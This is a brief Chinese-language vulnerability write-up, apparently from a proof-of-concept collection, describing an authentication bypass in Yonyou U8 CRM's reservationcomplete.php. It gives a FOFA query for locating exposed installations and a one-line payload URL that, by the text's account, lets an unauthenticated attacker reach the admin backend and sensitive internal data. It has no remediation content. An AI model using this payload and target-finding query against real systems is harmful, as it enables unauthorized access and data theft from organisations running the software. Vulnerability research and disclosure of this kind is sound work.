Y15-2用友-U8+-PermisssionAC

漏洞描述：

用友 U8 CRM客户关系管理系统 reservationcomplete.php文件存在逻辑漏洞，未授权的攻击者通过漏洞可以直接登录后台，获取系统内部敏感信息，使系统处于极不安全状态。

网站图片:

网络测绘:

fofa语法：

FOFA：app=“用友U8CRM”

漏洞复现:

payload：

/background/reservationcomplete.php?ID=1

效果图:
拼接url访问页面接口，重新访问首页即可登录